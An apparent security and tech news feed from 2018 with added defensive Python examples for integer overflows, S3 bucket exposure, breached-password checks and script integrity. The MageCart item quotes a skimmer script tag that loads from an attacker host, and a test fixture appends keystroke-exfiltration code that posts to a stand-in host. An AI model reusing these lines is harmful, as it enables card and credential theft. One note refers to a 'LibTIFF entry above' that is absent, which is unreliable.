Intel Patched A Vulnerability Leaking Intel ME Encryption Keys

Despite continuous patches, Intel CPUs keep making the news for one vulnerability or another spotted by researchers. While numerous

Intel Patched A Vulnerability Leaking Intel ME Encryption Keys on Latest Hacking News.

Beating the odds in market entry

mckinsey.com - How to avoid the cognitive biases that undermine market entry decisions. The annals of business history report that for every successful market entry, about four fail. Inexperienced start-ups suffer …


Tweeted by @RobertLaubscher https://twitter.com/RobertLaubscher/status/1041419726629609474

Security Affairs: Cyber attack took offline flight display screens at the Bristol Airport

The Bristol Airport was hit by a cyber attack that caused problems with operations, flight display screens were taken offline for two days.

The Bristol Airport was hit by a ransomware-based attack that caused problems to the flight display screens for two entire days.

The news was reported by the BBC and confirmed by an airport spokesman, who explained that the information screens were taken offline early on Friday in response to a “ransomware”-based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days,” states the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

Airport staff started incident response and contingency measures; “manual processes” made up for the interruption of the systems, with the spokesman referring to the use of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.

Image (source: BBC, copyright Julieanne McMahon): a spokesman said whiteboards and marker pens had to be used in place of display screens.

Experts do not believe it was a targeted attack on British critical infrastructure.

“The indications are that this was a speculative attempt rather than a targeted attack on Bristol Airport.”

The good news is that flights were not affected by the cyber attack.

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”

Pierluigi Paganini

(Security Affairs – Bristol Airport, hacking)

The post Cyber attack took offline flight display screens at the Bristol Airport appeared first on Security Affairs.


Who Needs Liquidity? Aurora (AOA) Recovers 251% On One Exchange

Aurora (AOA) was one of the hardest hit altcoins between August and September as AOA tokens fell 81% in value. That descent occurred over the space of just thirty-eight days, and marked a spectacular fall for a token that only launched in June. Now that same momentum appears to have reversed with AOA gaining 251% […]

The post Who Needs Liquidity? Aurora (AOA) Recovers 251% On One Exchange appeared first on Hacked: Hacking Finance.

Atlantic Council Panel on Cyber Warfare

c-span.org - *This transcript was compiled from uncorrected Closed Captioning. Panelists talked about the origin and process of developing the Tallinn Manual on the International Law Applicable to Cyber… Honorees…


Tweeted by @wendygirard https://twitter.com/wendygirard/status/1041413056968847360

India’s Space Agency Successfully Launches 2 UK Earth Observation Satellites

The late-night dark skies at Sriharikota, India, lit up in bright orange hues as the PSLV-C42 lifted off and vanished into the thick black clouds, carrying two satellites from the United Kingdom -- NovaSAR and S1-4 from the first launch pad at the Satish Dhawan Space Centre, SHAR. Local news outlet reports: The lightest version of the PSLV, flying in its core-alone version without the six strap-on motors, the PSLV-C-42 rose into the skies at 10.08 p.m. Almost 18 minutes later, the two satellites were placed in the desired orbit by ISRO. This was the 12th such launch of a core-alone version of the PSLV by ISRO. "This was a spectacular mission. We have placed the satellite in a very, very precise orbit," R. Hutton, Mission Director, said. The two satellites, owned by Surrey Satellite Technology Ltd (SSTL) were placed in a circular orbit around the poles, 583 km (362 miles) from Earth. The commercial arm of ISRO, Antrix Corporation earned more than ₹220 crore ($30.5 million) on this launch. The NovaSAR is a technology demonstration mission designed to test the capabilities of a new low cost S-band SAR platform. It will be used for ship detection and maritime monitoring and also flood monitoring, besides agricultural and forestry applications. The S1-4 will be used for environment monitoring, urban management, and tackling disasters. On the sidelines, the Indian Space Research Organization (ISRO) said it will launch three more satellites to provide high-speed bandwidth connectivity to rural areas as part of the government's Digital India programme, a local news agency reported.

Read more of this story at Slashdot.


Good Crypto News: What It All Means

It was another one of those weeks.  Crypto prices hit rock bottom around $186 billion. Goldman Sachs backs away from its plans to offer a crypto trading desk.  Vitalik Buterin tells Bloomberg how little he thinks of Ethereum. Technical analysts give us little hope for getting bullish anytime soon. But that was before The New […]

The post Good Crypto News: What It All Means appeared first on Hacked: Hacking Finance.

Survey Finds 85% of Underserved Students Have Access To Only One Digital Device

New research [PDF] on students who took the ACT test, conducted by the ACT Center for Equity in Learning, found that 85% of underserved (meaning low income, minority, or first generation in college) students had access to only one device at home, most often a smartphone. From a blog post: American Indian/Alaskan, Hispanic/Latino, and African American students had the least access. White and Asian students had the most. Nearly a quarter of students who reported that family income was less than $36,000 a year had access to only a single device at home, a 19% gap compared to students whose family income was more than $100,000.

Read more of this story at Slashdot.

Morpheus –TCP/UDP Manipulation Framework

Morpheus is an open source framework that can launch multiple attacks on the network using applications, such as ettercap, msgsnarf,

Morpheus –TCP/UDP Manipulation Framework on Latest Hacking News.

For Decades, Some of the Atomic Matter in the Universe Had Not Been Located. Recent Papers Reveal Where It Has Been Hiding

In a series of three recent papers, astronomers have identified the final chunks of all the ordinary matter in the universe. From a report: And despite the fact that it took so long to identify it all, researchers spotted it right where they had expected it to be all along: in extensive tendrils of hot gas that span the otherwise empty chasms between galaxies, more properly known as the warm-hot intergalactic medium, or WHIM. Early indications that there might be extensive spans of effectively invisible gas between galaxies came from computer simulations done in 1998. "We wanted to see what was happening to all the gas in the universe," said Jeremiah Ostriker, a cosmologist at Princeton University who constructed one of those simulations along with his colleague Renyue Cen. The two ran simulations of gas movements in the universe acted on by gravity, light, supernova explosions and all the forces that move matter in space. "We concluded that the gas will accumulate in filaments that should be detectable," he said. Except they weren't -- not yet. "It was clear from the early days of cosmological simulations that many of the baryons would be in a hot, diffuse form -- not in galaxies," said Ian McCarthy, an astrophysicist at Liverpool John Moores University. Astronomers expected these hot baryons to conform to a cosmic superstructure, one made of invisible dark matter, that spanned the immense voids between galaxies. The gravitational force of the dark matter would pull gas toward it and heat the gas up to millions of degrees. Unfortunately, hot, diffuse gas is extremely difficult to find. To spot the hidden filaments, two independent teams of researchers searched for precise distortions in the CMB, the afterglow of the Big Bang. As that light from the early universe streams across the cosmos, it can be affected by the regions that it's passing through. 
In particular, the electrons in hot, ionized gas (such as the WHIM) should interact with photons from the CMB in a way that imparts some additional energy to those photons. The CMB's spectrum should get distorted. Unfortunately the best maps of the CMB (provided by the Planck satellite) showed no such distortions. Either the gas wasn't there, or the effect was too subtle to show up. But the two teams of researchers were determined to make them visible. From increasingly detailed computer simulations of the universe, they knew that gas should stretch between massive galaxies like cobwebs across a windowsill. Planck wasn't able to see the gas between any single pair of galaxies. So the researchers figured out a way to multiply the faint signal by a million.

Read more of this story at Slashdot.

ICO Analysis: Block66

The mortgage market is one of the biggest financial markets in the world. The market in the United States is around $10 trillion dollars, but the worldwide figure of $33 trillion is even more impressive. Yet getting a mortgage is not easy as risk-averse institutions do not have business with many viable candidates. Even if […]

The post ICO Analysis: Block66 appeared first on Hacked: Hacking Finance.

Week in review: API security, malware-less email attacks, reversing the cybersecurity skills shortage

Here’s an overview of some of last week’s most interesting news and articles: What can we do to reverse the cybersecurity skills shortage? Having a strong pipeline of talent coming through is vital to help organizations and individuals protect themselves. How do you feed that pipeline, though? Verizon details breaches they were called in to investigate Last year, Verizon Enterprise Solutions released a Data Breach Digest that gathered 16 cybercrime case studies. This year, each … More

The post Week in review: API security, malware-less email attacks, reversing the cybersecurity skills shortage appeared first on Help Net Security.

CVE-2018-17088

The ProcessGpsInfo function of the gpsinfo.c file of jhead 3.00 may allow a remote attacker to cause a denial-of-service attack or unspecified other impact via a malicious JPEG file, because there is an integer overflow during a check for whether a location exceeds the EXIF data length. This is analogous to the CVE-2016-3822 integer overflow in exif.c. This gpsinfo.c vulnerability is unrelated to the CVE-2018-16554 gpsinfo.c vulnerability.
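The LibTIFF entry above (CVE-2018-17100, the int32 overflow in multiply_ms) and this jhead entry belong to the same bug class: a size or offset computation wraps around before a bounds check, so the check passes and an undersized buffer or an out-of-range location is used. The Python below, added here as an illustration and not code from either project, emulates C's signed 32-bit wraparound to show how a dimension product and an EXIF offset-plus-length check each go wrong, beside the overflow-aware form of each check. The input values and function names are constructed; the real functions use different types and names.

```python
INT32_MAX = 2**31 - 1


def wrap_int32(x: int) -> int:
    """Emulate two's-complement wraparound of a C signed 32-bit int.

    In C this happens silently when a product or sum exceeds INT32_MAX;
    Python ints never overflow, so the behaviour has to be simulated.
    """
    x &= 0xFFFFFFFF
    return x - 2**32 if x & 0x80000000 else x


def unchecked_multiply(a: int, b: int) -> int:
    """Vulnerable shape: multiply, wrap, then use the result as a buffer size."""
    return wrap_int32(a * b)


def checked_multiply(a: int, b: int) -> int:
    """Overflow-aware product (hypothetical reconstruction of a fixed multiply
    helper, not the library's source). Returns 0 on overflow, which the caller
    treats like an allocation failure instead of allocating a tiny buffer."""
    if a < 0 or b < 0:
        return 0
    if a != 0 and b > INT32_MAX // a:
        return 0
    return a * b


def unchecked_location_in_bounds(offset: int, length: int, data_len: int) -> bool:
    """Vulnerable shape of an EXIF bounds check: offset + length wraps, so a
    huge offset looks small (even negative) and the check passes."""
    return wrap_int32(offset + length) <= data_len


def checked_location_in_bounds(offset: int, length: int, data_len: int) -> bool:
    """Rearranged so no intermediate value can overflow: operands are
    non-negative and the subtraction happens on the trusted side."""
    if offset < 0 or length < 0 or data_len < 0:
        return False
    return length <= data_len and offset <= data_len - length


def demo() -> dict:
    """Constructed inputs: a 65536 x 65537 image (about 4 GiB of samples) and
    an EXIF entry whose offset sits just below the int32 limit."""
    width, height = 65536, 65537
    offset, length, exif_len = 0x7FFFFFF0, 32, 4096
    return {
        "unchecked_size": unchecked_multiply(width, height),    # 65536: tiny buffer
        "checked_size": checked_multiply(width, height),        # 0: overflow detected
        "unchecked_in_bounds": unchecked_location_in_bounds(offset, length, exif_len),  # True: check bypassed
        "checked_in_bounds": checked_location_in_bounds(offset, length, exif_len),      # False: rejected
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The same rearrangement applies to any parser that validates a location with `offset + length <= total`: compare `offset <= total - length` after checking `length <= total`, or use a wider type and check before narrowing.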

What is a chatbot, why you need it?

blog.openwebsolutions.in - If you have attempted to get in touch with a company, you would know the depth of frustration which one goes through. Calling does not help as the caller is put through a lengthy process which does n…


Tweeted by @Necio_news https://twitter.com/Necio_news/status/1041374909841256453

Diplomatic crisis over Russian espionage

tagesanzeiger.ch - Russian espionage in Switzerland has become very intrusive. The intelligence operations uncovered by the Tamedia research desk – against the Spiez laboratory and the anti-doping agency in Lausanne –…


Tweeted by @lennutrajektoor https://twitter.com/lennutrajektoor/status/1041372287038119936

The Linux Kernel Has Grown By 225,000 Lines of Code This Year, With Contributions From About 3,300 Developers

Here's an analysis of the Linux kernel repository that attempts to find some fresh numbers on the current kernel development trends. The author writes: The kernel repository is at 782,487 commits in total from around 19,009 different authors. The repository is made up of 61,725 files and from there around 25,584,633 lines -- keep in mind there is also documentation, Kconfig build files, various helpers/utilities, etc. So far this year there have been 49,647 commits that added 2,229,836 lines of code while dropping 2,004,759 lines of code. Or a net gain of just 225,077 lines. Keep in mind there was the removal of some old CPU architectures and other code removed in kernels this year so while a lot of new functionality was added, thanks to some cleaning, the kernel didn't bloat up as much as one might have otherwise expected. In 2017 there were 80,603 commits with 3,911,061 additions and 1,385,507 deletions. Given just over one quarter to go, on a commit and line count 2018 might come in lower than the two previous years. Linus Torvalds remains the most frequent committer at just over 3% while the other top contributions to the kernel this year are the usual suspects: David S. Miller, Arnd Bergmann, Colin Ian King, Chris Wilson, and Christoph Hellwig. So far in 2018 there were commits from 3,320 different email addresses. This is actually significantly lower than in previous years.

Read more of this story at Slashdot.

Did PCHAIN’s Times Square Marketing Ploy Fall on Deaf Ears?

Little known altcoin, PCHAIN (PAI) just celebrated the successful launch of its testnet by hiring the Thomson-Reuters digital advertising screen in the middle of Times Square, New York. The prime advertising space garners an estimated 150 million unique impressions per year, and one screen costs roughly $7,000 for a day’s use. However, the effect on […]

The post Did PCHAIN’s Times Square Marketing Ploy Fall on Deaf Ears? appeared first on Hacked: Hacking Finance.

New Cold Boot Attacks Can Evade Current Mitigations

Many people tend to put laptops to ‘Sleep’ instead of shutting them down. Whether you’re at home, or at your

New Cold Boot Attacks Can Evade Current Mitigations on Latest Hacking News.

Medical records & patient-doctor recordings of thousands of people exposed

By Carolina

Another day, another trove of medical records leaked online, thanks to a misconfigured AWS S3 bucket. Medical records are considered sensitive documents, and when a malicious third party has access to them it is bad news, as these records can be used for fraud, blackmail and marketing purposes against patients’ will. However, […]

This is a post from HackRead.com Read the original post: Medical records & patient-doctor recordings of thousands of people exposed
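An added example, not code from the HackRead story or from AWS, showing the two checks a practitioner runs on a bucket to catch the "anyone can read" misconfiguration behind leaks like this one: the bucket policy document and the ACL grant list. Both inputs are constructed in the shape the S3 API returns them (GetBucketPolicy returns the policy as a JSON string; GetBucketAcl returns a list of grants with group URIs). The bucket name and the IAM role ARN are placeholders.

```python
import json

# Constructed policy resembling a public-read misconfiguration; placeholder bucket name.
PUBLIC_READ_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::patient-records", "arn:aws:s3:::patient-records/*"],
    }],
})

# Constructed policy that grants access only to one application role.
PRIVATE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/records-app"},
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::patient-records/*",
    }],
})

# Constructed ACL grants in the shape of GetBucketAcl's "Grants" list.
SAMPLE_ACL_GRANTS = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]

# The two predefined groups whose presence in an ACL makes a bucket world- or any-AWS-user-readable.
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
READ_ACTIONS = {"s3:*", "s3:getobject", "s3:listbucket"}


def _as_list(value):
    """Policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def principal_is_public(principal) -> bool:
    """True for Principal "*" or any {"AWS": "*"} / {"AWS": [..., "*"]} form."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False


def public_statements(policy_json: str) -> list:
    """Allow statements that let an anonymous principal read or list.

    A Condition block may narrow the grant (for example to a VPC endpoint), so
    such statements are reported but marked conditional for manual review.
    NotPrincipal / NotAction forms are out of scope for this check.
    """
    findings = []
    policy = json.loads(policy_json)
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not principal_is_public(stmt.get("Principal")):
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action"))]
        exposed = sorted(a for a in actions if a in READ_ACTIONS)
        if exposed:
            findings.append({"sid": stmt.get("Sid"), "actions": exposed,
                             "conditional": bool(stmt.get("Condition"))})
    return findings


def public_acl_grants(grants) -> list:
    """(group, permission) pairs granted to the AllUsers / AuthenticatedUsers groups."""
    out = []
    for g in grants:
        grantee = g.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUP_URIS:
            out.append((PUBLIC_GROUP_URIS[grantee["URI"]], g.get("Permission")))
    return out


def assess_bucket(policy_json: str, grants) -> dict:
    stmts = public_statements(policy_json)
    acl = public_acl_grants(grants)
    unconditional = [s for s in stmts if not s["conditional"]]
    return {"public_policy_statements": stmts, "public_acl_grants": acl,
            "publicly_readable": bool(unconditional) or bool(acl)}


if __name__ == "__main__":
    print(assess_bucket(PUBLIC_READ_POLICY, SAMPLE_ACL_GRANTS))
    print(assess_bucket(PRIVATE_POLICY, []))
```

In a real account these inputs come from the GetBucketPolicy and GetBucketAcl calls for every bucket, and the account-level S3 Block Public Access setting should be enabled regardless, so that a stray policy or ACL like the ones above cannot take effect.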

Amazon Says It is Investigating Claims That Its Employees Are Taking Bribes To Sell Internal Data To Merchants To Help Them Increase Their Sales on the Website

Amazon.com is investigating internal leaks as it fights to root out fake reviews and other seller scams from its website, the company told WSJ. From the report: Employees of Amazon, primarily with the aid of intermediaries, are offering internal data and other confidential information that can give an edge to independent merchants selling their products on the site, according to sellers who have been offered and purchased the data, brokers who provide it and people familiar with internal investigations. The practice, which violates company policy, is particularly pronounced in China, according to some of these people, because the number of sellers there is skyrocketing. As well, Amazon employees in China have relatively small salaries, which may embolden them to take risks. In exchange for payments ranging from roughly $80 to more than $2,000, brokers for Amazon employees in Shenzhen are offering internal sales metrics and reviewers' email addresses, as well as a service to delete negative reviews and restore banned Amazon accounts, the people said. Amazon is investigating a number of cases involving employees, including some in the U.S., suspected of accepting these bribes, according to people familiar with the matter. An internal probe began in May after Eric Broussard, Amazon's vice president who oversees international marketplaces, was tipped off to the practice in China, according to people familiar with the matter. Amazon has since shuffled the roles of key executives in China to try to root out the bribery, one of these people said.

Read more of this story at Slashdot.

Trade Recommendation: Populous

The Populous/Bitcoin (PPT/BTC) pair took out resistance of 0.00056 on August 16, 2018. The breach triggered the breakout from the large falling wedge on the daily chart. The breakout looks valid because it was followed by a surge in volume and price. PPT/BTC managed to climb to as high as 0.00108 on August 17. Unfortunately, […]

The post Trade Recommendation: Populous appeared first on Hacked: Hacking Finance.

CVE-2018-17082

The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a "Transfer-Encoding: chunked" request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.

Automation: The Exaggerated Threat of Robots

It will take quite a lot of time before robots become cheaper than workers in emerging markets such as Africa, argues Nico Beckert of Flassbeck Economics, a consortium of researchers who aim to provide economics insights with a more realistic basis. From the post: All industrialized countries used low-cost labour to build industries and manufacture mass-produced goods. Today, labour is relatively inexpensive in Africa, and a similar industrialization process might take off accordingly. Some worry that industrial robots will block this development path. The reason is that robots are most useful when doing routine tasks -- precisely the kind of work that is typical of labour-intensive mass production. At the moment, however, robots are much too expensive to replace thousands upon thousands of workers in labour-intensive industries, most of which are in the very early stages of the industrialization process. Robots are currently best used in technologically more demanding fields like the automobile or electronics industry. Even a rapid drop in robot prices would not lead to the replacement of workers by robots in the short term in Africa where countries lag far behind in terms of fast internet and other information and communications technologies. They also lack well-trained IT experts. Other problems include an unreliable power supply, high energy costs and high financing costs for new technologies. For these reasons, it would be difficult and expensive to integrate robots and other digital technologies into African production lines.

Read more of this story at Slashdot.

E Hacking News – Latest Hacker News and IT Security News: 42 Million Emails And Passwords Uploaded To A Free, Public Hosting Service

A collection of roughly 42 million records was recently uploaded to kayo.moe, an anonymous, free file hosting service. The files contained unique email addresses and plaintext passwords, alongside partial credit card data.

Troy Hunt, the Australian security researcher who runs the Have I Been Pwned (HIBP) breach index, was asked to analyse the collection and determine whether it came from a single, previously unknown breach. He found that more than 91% of the passwords in the dataset were already in Have I Been Pwned, and that the filenames in the collection did not point to a specific source, since there was no single pattern to the breaches the records had appeared in.

Judging by the format of the data, the lists were most likely assembled for credential stuffing attacks: cracked passwords and email addresses are consolidated into a single list and replayed automatically against other online services in order to hijack whichever accounts match.

Sample of data from lists sent to Hunt

Credential stuffing works because users, for convenience, tend to reuse the same credentials across many sites, so a password stolen from one service frequently unlocks accounts on others.

"When I pulled the email addresses out of the file, I found almost 42M unique values. I took a sample set and found about 89% of them were already in HIBP which meant there was a significant amount of data I've never seen before," Hunt wrote in a blog post.

The collection consisted of 755 files totalling 1.8GB.

Users are, as always, advised to use strong and distinct passwords for each account, and to enable multi-factor authentication wherever it is offered.
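The practical follow-up to a list like this is to stop users from choosing passwords that are already in it. HIBP's Pwned Passwords range endpoint lets a site do that without ever sending the password, or its full hash, to a third party: the client sends the first five hex characters of the SHA-1 and matches the returned suffixes locally. The code below is an added example, not from the article or from Troy Hunt's own tooling; the live `fetch_range` function uses the public `https://api.pwnedpasswords.com/range/` endpoint, while the demo runs against a constructed stand-in whose counts are made up (only the suffix of SHA-1("password") is real).

```python
import hashlib
import urllib.request

RANGE_API = "https://api.pwnedpasswords.com/range/"


def sha1_hex_upper(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_for_range_query(password):
    """Return (prefix, suffix): only the 5-char prefix ever leaves the host."""
    digest = sha1_hex_upper(password)
    return digest[:5], digest[5:]


def count_in_range_response(suffix, response_text):
    """Parse the 'SUFFIX:COUNT' lines the range endpoint returns."""
    for line in response_text.splitlines():
        line = line.strip()
        if not line:
            continue
        candidate, _, count = line.partition(":")
        if candidate.strip().upper() == suffix:
            return int(count.strip())
    return 0


def fetch_range(prefix):
    """Live fetch of one hash range (needs network access; not used by the demo)."""
    req = urllib.request.Request(
        RANGE_API + prefix, headers={"User-Agent": "pwned-passwords-check"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def pwned_count(password, fetcher=fetch_range):
    """How many times the password appears in Pwned Passwords (0 = not seen)."""
    prefix, suffix = split_for_range_query(password)
    return count_in_range_response(suffix, fetcher(prefix))


# Constructed stand-in for the API so the example runs offline.  The middle
# suffix is the real tail of SHA-1("password"); the other suffixes and all
# counts are invented.
FAKE_RANGES = {
    "5BAA6": "\r\n".join([
        "1D2DA4053E34E76F6576ED1DA63134B5E2A:2",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3533661",
        "1F2B668E8AABEF1C59E9EC6F82E3F3CD786:1",
    ]),
}


def fake_fetch(prefix):
    return FAKE_RANGES.get(prefix, "")


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print("%r seen %d times" % (pw, pwned_count(pw, fake_fetch)))
```

Wire `pwned_count` into the password-change path and reject (or at least warn on) any non-zero result; a match does not mean this user's account is in the dump, only that attackers already have the password in their stuffing lists. Rate-limiting and multi-factor authentication on the login path still matter, because a stuffing list built from other sites never touches the registration flow.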




Microsoft September Patch Fixed 61 Vulnerabilities Including A Zero-Day

Last month, Microsoft Patch Tuesday addressed 60 vulnerabilities that also included two zero-day flaws. This month also, the tech giant

Microsoft September Patch Fixed 61 Vulnerabilities Including A Zero-Day on Latest Hacking News.

Security Affairs: Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

The MageCart crime gang is very active at the moment: payment card data from customers of hundreds of e-commerce websites may have been stolen after the compromise of the cloud service firm Feedify.

Feedify, which has over 4,000 customers, is a cloud platform that lets its customers engage their own visitors with tools that target them based on their behaviour.

To use the service, Feedify customers add a JavaScript snippet to their websites. That script loads various resources from Feedify's infrastructure, including a library named "feedbackembad-min-1.0.js", and it was this library that MageCart compromised, turning Feedify into a supply-chain attack vector.


Every visitor to a page on a Feedify customer's e-commerce site therefore loaded the malicious script, which allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script into target websites to siphon payment card data: once the attackers have compromised a site, they add a piece of JavaScript to its HTML template. Below is an example of one such script, dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attackers.

The hackers typically try to compromise third-party components, because a single compromised component gives them access to a large number of websites at once.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against British Airways and used a customised version of the script to stay under the radar.

Using the same tactic, MageCart compromised websites that use the Feedify service by injecting malicious code into a library that the Feedify script serves to customers' websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once Feedify was notified of the compromise, the company removed the malicious script, but the attackers apparently re-infected the library.

The events demonstrate the MageCart crime gang's ability not only to compromise the infrastructure of its victims but to regain access after a cleanup.

In August, security expert Willem de Groot found that the MagentoCore skimmer had already infected 7,339 Magento stores.

At the time, a query of the PublicWWW service showed the MagentoCore script deployed on 5,214 domains; the number of compromised websites is still high (4,762) despite the awareness campaign.
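Both attacks described above depend on a site loading a third-party script whose content the site never verified. Subresource Integrity (SRI) addresses exactly that: the page pins a hash of the reviewed script in the `integrity` attribute, and the browser refuses to execute a fetched copy that does not match, so a re-infected library fails closed instead of skimming the checkout page. The code below is an added example, not Feedify's, RiskIQ's or Security Affairs' code; it computes and verifies SRI values for a reviewed library and, as a second check a site operator can run against their own rendered pages, lists script hosts that are not on an allow-list, which is the same kind of search de Groot ran on PublicWWW. The library contents, the checkout page and the hostnames `shop.example` and `cdn.feedify.example` are constructed for the example; only `magentocore.net` comes from the article.

```python
import base64
import hashlib
import hmac
import re
from urllib.parse import urlparse


def sri_hash(body, algo="sha384"):
    """Return the value for a <script integrity="..."> attribute."""
    digest = hashlib.new(algo, body).digest()
    return "%s-%s" % (algo, base64.b64encode(digest).decode("ascii"))


def sri_matches(body, integrity):
    """True if the fetched body still matches the pinned integrity value."""
    algo, _, _ = integrity.partition("-")
    return hmac.compare_digest(sri_hash(body, algo), integrity)


def pinned_script_tag(src, body):
    """Emit the tag a site should ship for a third-party script it has reviewed.

    crossorigin="anonymous" is required for the browser to enforce SRI on a
    cross-origin script.
    """
    return '<script src="%s" integrity="%s" crossorigin="anonymous"></script>' % (
        src, sri_hash(body))


SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def unexpected_script_hosts(html, allowed_hosts):
    """Hosts serving <script src> on the page that are not on the allow-list."""
    found = set()
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            found.add(host.lower())
    return found


# Constructed fixtures: a reviewed copy of a vendor library, and the same file
# after a keystroke-skimming payload has been appended to it.
CLEAN_LIBRARY = b"window.feedify = window.feedify || {};\n"
TAMPERED_LIBRARY = CLEAN_LIBRARY + (
    b"document.addEventListener('keyup', function (e) {"
    b" new Image().src = 'https://exfil.invalid/?k=' + e.key; });\n"
)

# Constructed checkout page: one first-party script plus a script injected into
# the template the way the article describes (host taken from the MagentoCore example).
CHECKOUT_HTML = """
<script src="https://shop.example/static/checkout.js"></script>
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
"""
ALLOWED_HOSTS = {"shop.example", "cdn.feedify.example"}  # hypothetical hosts

if __name__ == "__main__":
    integrity = sri_hash(CLEAN_LIBRARY)
    print(pinned_script_tag("https://cdn.feedify.example/feedbackembad-min-1.0.js", CLEAN_LIBRARY))
    print("clean copy matches pin:   ", sri_matches(CLEAN_LIBRARY, integrity))
    print("tampered copy matches pin:", sri_matches(TAMPERED_LIBRARY, integrity))
    print("unexpected script hosts:  ", unexpected_script_hosts(CHECKOUT_HTML, ALLOWED_HOSTS))
```

The trade-off is that SRI also breaks on a vendor's legitimate update, so a library that changes often has to be re-reviewed and re-pinned as part of the site's build; for a checkout page that is the right default, since the alternative is executing whatever the vendor's server happens to serve. A Content-Security-Policy with a `script-src` allow-list and a tight `connect-src`/`img-src` adds a second layer by blocking the exfiltration request even if a skimmer does run.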

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.




Weekly Forecast: Cryptocurrencies – Stable Recovery or Dead Cat Bounce?

After a volatile couple of weeks, the cryptocurrency market is showing signs of revival. Bitcoin and Ethereum have been the main catalysts for the recovery, though for entirely different reasons. Bitcoin is regaining its stability – a recently acquired status – while Ethereum appears to have stemmed a massive decline that was driven almost entirely by […]

The post Weekly Forecast: Cryptocurrencies – Stable Recovery or Dead Cat Bounce? appeared first on Hacked: Hacking Finance.

Why Edinburgh’s Clock is Almost Never on Time

Arrive in Edinburgh on any given day and there are certain things you can guarantee. One of which is, the time on the turret clock atop The Balmoral Hotel is always wrong. By three minutes, to be exact. From a report: While the clock tower's story is legendary in Edinburgh, it remains a riddle for many first-timers. To the untrained eye, the 58m-high landmark is simply part of the grand finale when surveyed from Calton Hill, Edinburgh's go-to city-centre viewpoint. There it sits to the left of the Dugald Stewart Monument, like a giant exclamation mark above the glazed roof of Waverley Train Station. Likewise, the sandstone baronial tower looks equally glorious when eyed from the commanding northern ramparts of Edinburgh Castle while peering out over the battlements. It is placed at the city's very centre of gravity, between the Old Town and the New Town, at the confluence of all business and life. Except, of course, that the dial's big hand and little hand are out of sync with Greenwich Mean Time. This bold irregularity is, in fact, a historical quirk first introduced in 1902 when the Edwardian-era building opened as the North British Station Hotel. Then, as now, it overlooked the platforms and signal boxes of Waverley Train Station, and just as porters in red jackets met guests off the train, whisking them from the station booking hall to the interconnected reception desk in the hotel's basement, the North British Railway Company owners wanted to make sure their passengers -- and Edinburgh's hurrying public -- wouldn't miss their trains. Given an extra three minutes, they reasoned, these travellers would have more time on the clock to collect their tickets, to reach their corridor carriages and to unload their luggage before the stationmaster's whistle blew. Still today, it is a calculated miscalculation that helps keep the city on time.

Read more of this story at Slashdot.

Protecting the connected barrels

deloitte.com - For years, cyber attackers have targeted crude oil and natural gas (O&G) companies, with attacks growing in frequency, sophistication, and impact as the industry employs ever more connected technolog…


Tweeted by @Taro_Siddiqui https://twitter.com/Taro_Siddiqui/status/1041323504023601152